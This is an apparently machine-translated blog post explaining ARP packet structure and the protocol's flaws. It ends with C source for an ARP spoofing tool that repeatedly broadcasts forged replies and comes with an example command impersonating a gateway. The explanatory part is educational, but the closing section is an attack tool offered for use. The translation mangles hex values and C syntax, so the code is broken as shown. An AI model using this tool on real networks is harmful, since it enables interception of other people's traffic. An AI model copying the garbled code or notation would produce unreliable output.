ARP principles and defects (with source code of ARP spoofing)

0 Introduction

An important reason why the IP protocol is widely used globally is that it can run on almost all links, such as point-to-point serial lines, ring network FDDI, of course, the most common link layer supporting IP protocols is Ethernet. For point-to-point serial lines, there are only two nodes and there is no need to define physical addresses. For broadcast networks like Ethernet, each node on the network has a unique physical address.

The datagram generated by the IP layer must pass through the actual physical link layer to become a real physical signal, and where to send it depends on the destination IP address, however, the link layer does not know what the destination IP address is. It sends physical signals according to the destination MAC address. Therefore, you must know the target MAC address before sending an IP datagram, the ARP protocol is used to find the corresponding MAC function based on the IP address.

1 ARP packet format

The complete format of ARP datagram over Ethernet. The green area is the content of ARP. It must be noted that the size of the Ethernet data must be between and, while that of the ARP packet must be 28 bytes. Therefore, it must be filled with 18 bytes to meet the requirements.

The corresponding Ethernet frame type value of ARP is 0x0806.

In ARP, the link layer address type is Ethernet; the value is 1; the network layer type is IP; the value is 0x800; the link layer address length is 6; and the network layer address length is 4; op indicates the difference between ARP requests and responses. 1 indicates a request and 2 indicates a response. the sender's ethernet address indicates the host MAC that sends the ARP packet, the sender IP address is the IP address of the host that sends the ARP packet. The destination MAC address and destination IP address are the same as those of the host, which only indicates the receiver.

2. Normal ARP request and Response Process

The following is a discussion of op types.

The network topology is as follows:

 

Assume that host A does not know the MAC address of host B, then host A must send an arp request. When op = 1, it indicates an arp request. In the arp packet, the destination MAC address is unknown. Fill in with 0x0000000000000000, And the destination IP address is 192.168.0.101.

The destination MAC address of the Ethernet package must be the broadcast address 0 xffffffffff. The source MAC address of the Ethernet and the sender MAC address of the arp package are the MAC address of host A, that is, 0 xAAAAAAAAAAAA. The main data is as follows:

Ethernet frame source MAC: 0 xAAAAAAAAAAAA

Ethernet frame destination MAC: 0 xFFFFFFFFFFFF

ARP op = 1

ARP initiator MAC: 0 xAAAAAAAAAAAA

IP address of the ARP initiator: 192.168.0.100

ARP destination MAC: 0x000000000000

ARP Destination IP Address: 192.168.0.101

 

Because it is an Ethernet broadcast frame, all hosts on the switch (except the host to be sent) (if Vlan functions are available, the same Vlan is required) can receive this frame, after the frame is received, it is handed over to the ARP module for processing. The arp module analyzes the destination IP address in the ARP packet. The Gateway finds that the local IP address is different from the IP address, so it simply discards the IP address; host B finds that it is the same as its own IP address, so it sends ARP reply to host.

Ethernet frame source MAC: 0 xBBBBBBBBBBBB

Ethernet frame target MAC: 0 xAAAAAAAAAAAA

Arp op = 2

ARP initiator MAC: 0 bbbbbbbbbbbbbb

IP address of the ARP initiator: 192.168.0.101

ARP destination MAC: 0 xAAAAAAAAAAAA

ARP Destination IP Address: 192.168.0.100

At this time, the Ethernet frame is unicast, and only A can receive the frame. After receiving the frame, A submits it to the ARP module for processing. The ARP module extracts the IP address of the ARP initiator and the MAC address of the initiator (192.168.0.101, 0 xbbbbbbbbbbbbb ), such as arp cache.

3 ARP Defects

The above describes all the normal situations, but ARP is not a secure protocol, which can be spoofed by constructing ARP packets manually.

3.1 ARP requests and responses do not need to be paired

When the host receives an arp response, it accepts and updates the arp cache regardless of whether or not the request was previously sent. As a result, a false arp response can be sent to any host, for example:

Ethernet frame source MAC: 0 xBBBBBBBBBBBB

Ethernet frame target MAC: 0 xAAAAAAAAAAAA

Arp op = 2

ARP initiator MAC: 0 xbbbbbbbbbbbbbb

IP address of the ARP initiator: 192.168.0.1

ARP destination MAC: 0 xAAAAAAAAAAAA

At this time, host B sends A spoofing arp response, telling A that the MAC corresponding to the IP address 192.168.0.1 is host B. In this way, all Ethernet frames sent from A to 192.168.0.1 are sent to host B.

More importantly, arp does not check the MAC and IP addresses of the ARP destination.

3.2 ARP reply can also be broadcast

The reply package described above is unicast, but the reply package can also be broadcast, as shown below:

Ethernet frame source MAC: 0 xBBBBBBBBBBBB

Ethernet frame destination MAC: 0 xFFFFFFFFFFFF

Arp op = 2

ARP initiator MAC: 0 xbbbbbbbbbbbbbb

IP address of the ARP initiator: 192.168.0.1

ARP destination MAC: 0 xAAAAAAAAAAAA

 

In this case, all hosts in the CIDR block will be spoofed and the gateway 192.168.0.1 is host B.

It has been verified through experiments that Windows XP will be cheated by ARP reply broadcast packets, but Windows 7 will not, but Windows 7 will be cheated by unicast reply.

3.3 The source MAC of the Ethernet frame can be different from the initiator MAC in the ARP packet.

Normally, the source MAC of the Ethernet frame is the same as that of the initiator MAC in the ARP packet. But in fact, ARP relies on the initiator MAC in the ARP packet, rather than the source MAC of the Ethernet frame. As follows:

Ethernet frame source MAC: 0 xBBBBBBBBBBBB

Ethernet frame destination MAC: 0 xFFFFFFFFFFFF

Arp op = 2

ARP initiator MAC: 0 xCCCCCCCCCCCC

IP address of the ARP initiator: 192.168.0.1

ARP destination MAC: 0 xAAAAAAAAAAAA

In this case, 192.168.0.1 is mapped to a MAC: CCCCCCCCCCCC, which can be arbitrary.

3.4 The source MAC of an Ethernet frame can be any

This is not a problem with the ARP protocol, but with the ethernet card itself. As follows:

Ethernet frame source MAC: 0x888888888888

Ethernet frame destination MAC: 0 xFFFFFFFFFFFF

Arp op = 2

ARP initiator MAC: 0 xCCCCCCCCCCCC

IP address of the ARP initiator: 192.168.0.1

ARP destination MAC: 0 xAAAAAAAAAAAA

 

In this case, you cannot find the MAC address of the host that initiates ARP spoofing. Even if you know you are cheated, you do not know who cheated you.

 

 

Source code of ARP spoofing:
 
# Include <stdio. h>
2 # include <stdlib. h>
3 # include <string. h>
4 # include <sys/socket. h>
5 # include <netinet/in. h>
6
7/* arp packet structure */
8 struct arp_packet
9 {
10 unsigned char hard_type [2];
11 unsigned char pro_type [2];
12 unsigned char hard_len;
13 unsigned char pro_len;
14 unsigned char op [2];
15 unsigned char mac_sender [6];
16 unsigned char ip_sender [4];
17 unsigned char mac_target [6];
18 unsigned char ip_target [4];
19} _ attribute _ (_ packed __));
20
21/* Ethernet packet structure */
22 struct ethernet_packet
23 {
24 unsigned char mac_des [6];
25 unsigned char mac_src [6];
26 unsigned char frame_type [2];
27 struct arp_packet arp;
28 unsigned char pad [18];
29} _ attribute _ (_ packed __));
30
31/* initialize arp */
32 static void init_arp (struct ethernet_packet * ep)
33 {
34 ep-> frame_type [0] = 0x08;
35 ep-> frame_type [1] = 0x06;
36 ep-> arp. hard_type [0] = 0x00;
37 ep-> arp. hard_type [1] = 0x01;
38 ep-> arp. pro_type [0] = 0x08;
39 ep-> arp. pro_type [1] = 0x00;
40 ep-> arp. hard_len = 0x6;
41 ep-> arp. pro_len = 0x4;
42 ep-> arp. op [0] = 0x00;
43 ep-> arp. op [1] = 0x02;
44 memset (ep-> pad, 0, 18 );
45}
46
47/* hexadecimal characters into numbers */
48 static unsigned char ahex_to_num (char)
49 {
50 int num;
51 a = a | 0x20; // convert to lowercase letters
52 if (a <= '9' & a> = '0 '){
[Cpp] view plaincopy
53 num = a-0x30;
54} else if (a <= 'F' & a> = 'A '){
55 num = a-'A' + 10;
56} else {
57 num = 0xFF;
58}
59 return num;
60}
61/* change the MAC address string to a number
62 * return value: 0 -- succeeded; others -- failed
63 **/
64 static int get_mac_from_asci (char a_mac [12], unsigned char h_mac [6])
65 {
66 int I = 0;
67 for (I = 0; I <12; I + = 2 ){
68 if (a_mac [I]> = '0' & a_mac [I] <= '9 ') | (a_mac [I] | 0x20> = 'A' & a_mac [I] | 0x20 <= 'F ')){
69 h_mac [I/2] = 16 * ahex_to_num (a_mac [I]) + ahex_to_num (a_mac [I + 1]);
70} else {
71 printf ("MAC address format: AABBCCDDFFGG \ n ");
72 return-1;
73}
74}
75 return 0;
76}
77/* construct arp, return value: 0 -- successful */
78 int build_arp (struct ethernet_packet * ep, char * e_mac_src, char * e_mac_des, char * arp_mac_send, char * arp_ip_send, char * arp_mac_tgt, char * arp_ip_tgt)
79 {
80 init_arp (ep );
81 struct in_addr inaddr;
82 if (0 = inet_aton (arp_ip_tgt, & inaddr )){
83 printf ("Destination IP address input error \ n ");
84 return-1;
85}
86 memcpy (void *) ep-> arp. ip_target, (void *) & inaddr, 4 );
87 if (0 = inet_aton (arp_ip_send, & inaddr )){
88 printf ("initiating IP address input error \ n ");
89 return-2;
90}
91 memcpy (void *) ep-> arp. ip_sender, (void *) & inaddr, 4 );
92
93 if (get_mac_from_asci (e_mac_src, ep-> mac_src) |
94 get_mac_from_asci (e_mac_des, ep-> mac_des) |
95 get_mac_from_asci (arp_mac_send, ep-> arp. mac_sender) |
96 get_mac_from_asci (arp_mac_tgt, ep-> arp. mac_target )){
97 printf ("An error occurred while reading the MAC address \ n ");
98 return-1;
99}
100}
[Cpp] view plaincopy
101 int main (int argc, char ** argv)
102 {
103 struct ethernet_packet ep;
104 if (build_arp (& ep, argv [1], argv [2], argv [3], argv [4], argv [5], argv [6]) {
105 printf ("Usage: marp mac_src mac_des mac_send ip_send mac_tgt ip_tgt \ n ");
106 return-1;
107}
108 printf ("succeeded, la \ n ");
109
110 int fd = socket (AF_INET, SOCK_PACKET, htons (0x0806 ));
111 if (fd <0 ){
112 perror ("socket ");
113 exit (-1 );
114}
115 struct sockaddr sa;
116 strcpy (sa. sa_data, "eth0 ");
117 while (1 ){
118 sendto (fd, & ep, sizeof (ep), 0, & sa, sizeof (sa ));
119 sleep (5 );
120}
121 close (fd );
122 return 0;
123}
 
 
The execution format is: marp Ethernet frame source MAC Ethernet frame destination mac arp packet initiation ip arp packet destination mac arp packet destination IP address, such:
./Marp 000C29BEE91F ffffffffff 000C29BEE91F 172.16.35.254 00016109c0fc 172.16.35.220


From the growth track of smstong